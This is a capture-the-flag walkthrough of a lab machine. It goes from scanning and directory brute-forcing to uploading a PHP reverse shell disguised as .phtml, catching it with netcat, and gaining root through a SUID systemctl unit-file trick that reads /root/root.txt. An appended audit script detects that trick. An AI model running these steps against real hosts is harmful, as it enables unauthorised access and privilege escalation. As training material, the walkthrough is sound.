Vulnversity

os
3 min read, Jan 13, 2023

RECONNAISSANCE:

nmap -A -sT 10.10.234.51 -p-

nmap -O -sT 10.10.234.51 (to gather OS info)

Task 2: Locating directories with gobuster:

gobuster dir -u http://10.10.234.51:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

I found that /internal is the directory with the upload form. Next we try uploading files to check which file type is supported; our goal here is to be able to upload a shell.

Look through the page source to find something juicy. Nope, nothing there.

Capture the upload request in Burp Suite while trying to upload your shell, then use Intruder to run a sniper attack to find out which file type is allowed to be uploaded.

In my case Burp did not work with the Intruder attack, so I tested the extensions manually for my payload.
Our payload shell can be found in /usr/share/webshells/php; just update the IP and port before uploading.

Now we know that the acceptable format is .phtml, so we rename the shell with the mv command:
mv shell.php shell.phtml
and upload it to the web server.

Run gobuster again on the server, this time against /internal and looking for .phtml files:
gobuster dir -u http://10.10.234.51:3333/internal -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .phtml
We find an uploads directory, which is interesting. Now our goal is to execute the shell on the web server so that it connects back to the netcat listener in our terminal:
nc -lvnp 1234

Once we get access to the web server, we open the /etc/passwd file to get the list of users and the answer to the next question.

Now we look for the flag:
find / -name flag.txt -type f 2>/dev/null
No file found. Interesting; we then open the hint, which gives us the link to our file. Shebang!

Task 3: Privilege escalation:

Find SUID files:
find / -user root -perm -4000 -exec ls -ldb {} \;

File standing out:
/bin/systemctl

Escalating the privileges:
Well, to start I tried to use the exploits from the Linux PrivEsc room; it did not work, as it wouldn't let me make a .c file, nor a .sh file, and it wouldn't let me access the /etc/shadow file either. We don't have any sudo permissions, as we can see from the sudo -l command.
To put the cherry on the cake, they had crontabs disabled.

Took a hint from the video, so GTFOBins was used:
https://gtfobins.github.io/
https://n0w4n.nl/vulnversity/

So systemctl is the controlling interface and inspection tool for systemd. systemd initialises the user space components once the Linux kernel has booted and also maintains them throughout the lifecycle of the session.
Each component is referred to as a unit and has a unit file attached to it.

Question: what are user space components?
Answer: it refers to all the code that runs outside the kernel, that is, the various programs and libraries an OS uses to interact with the kernel.
Basically it is all the services and software installed on your Linux machine, and all of it is managed by systemd. Each process is a unit with its own unit file. We can create our own unit files as well, and that's what we do here. By default these files are located in /etc/systemd/system, but we can't write there, so we create an environment variable that holds the path of our own file.

Make a unit file:
moses=$(mktemp).service

mktemp is used to create an empty temporary file; .service is the extension for a service unit, and we store the resulting path in our newly created shell variable moses.

The unit file is written with a single echo (the closing quote and the redirect come at the end):

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $moses

[Service] is a section header used in a systemd service unit file.

ExecStart specifies the full path of a command that will be executed to start the service. Here it runs /bin/sh, which in turn runs the command "cat /root/root.txt > /tmp/output"; -c tells the shell to run the string that follows as a command.

[Install] controls how a unit behaves when it is enabled or disabled.

WantedBy is the common way to specify how a unit should be enabled. If the unit has WantedBy=multi-user.target, a directory called multi-user.target.wants will be created within /etc/systemd/system (if not already there) and a symbolic link to the unit will be placed inside it. Disabling the unit removes the link and removes the dependency relationship.

All of this is written to the file whose path is stored in our variable $moses.

Now, the easy part:
/bin/systemctl link $moses
This command creates a link from systemd's unit directory to our unit file, and we get a message like the one below. It allows us to start or stop the service as we want.

Created symlink from /etc/systemd/system/tmp.PtnS8Qb5fp.service to /tmp/tmp.PtnS8Qb5fp.service.

/bin/systemctl enable --now $moses
Now we get our file as output in the /tmp folder; open it and grab the flag.
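As an added defender-side check that is not part of the original walkthrough: this POSIX shell audit flags the footprints the technique above leaves on a host, a unit under the systemd unit directory that is a symlink into a scratch directory such as /tmp (or whose ExecStart touches one), and a systemctl binary carrying the SUID bit. The fixture directory and the tmp.PtnS8Qb5fp.service name (reused from the symlink message above) are constructed for the demo; on a real host you would point audit_unit_dir at /etc/systemd/system.

```shell
#!/bin/sh
# Added audit example, not from the original walkthrough. Looks for the
# footprints of a SUID-systemctl unit-file escalation: unit symlinks into
# scratch directories, ExecStart lines touching them, and SUID systemctl.

# Print every *.service under $1 that is a symlink into a user-writable
# scratch directory, or whose ExecStart reads from or writes to one.
audit_unit_dir() {
    dir="$1"
    for f in "$dir"/*.service; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        if [ -L "$f" ]; then
            target=$(readlink "$f")
            case "$target" in
                /tmp/*|/var/tmp/*|/dev/shm/*|/home/*)
                    printf 'LINK %s -> %s\n' "$f" "$target" ;;
            esac
        fi
        [ -f "$f" ] || continue                   # dangling link: no body to read
        if grep -Eq '^ExecStart=.*(/tmp/|/var/tmp/|/dev/shm/)' "$f"; then
            printf 'EXEC %s: %s\n' "$f" "$(grep -E '^ExecStart=' "$f" | head -n 1)"
        fi
    done
    return 0
}

# Report systemctl binaries carrying the SUID bit (the root of this privesc).
check_suid_systemctl() {
    for b in /bin/systemctl /usr/bin/systemctl; do
        [ -u "$b" ] && printf 'SUID %s\n' "$b"
    done
    return 0
}

# Constructed fixture (assumption): a fake unit directory holding one ordinary
# unit and one unit linked from /tmp, mirroring the symlink the walkthrough shows.
fixture=$(mktemp -d /tmp/unitaudit.XXXXXX)
mkdir -p "$fixture/units"
printf '[Service]\nExecStart=/usr/sbin/sshd -D\n' > "$fixture/units/ssh.service"
printf '[Service]\nExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"\n[Install]\nWantedBy=multi-user.target\n' \
    > "$fixture/tmp.PtnS8Qb5fp.service"
ln -s "$fixture/tmp.PtnS8Qb5fp.service" "$fixture/units/tmp.PtnS8Qb5fp.service"

audit_unit_dir "$fixture/units"      # one LINK and one EXEC finding expected
check_suid_systemctl                 # prints nothing on a correctly configured host
```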
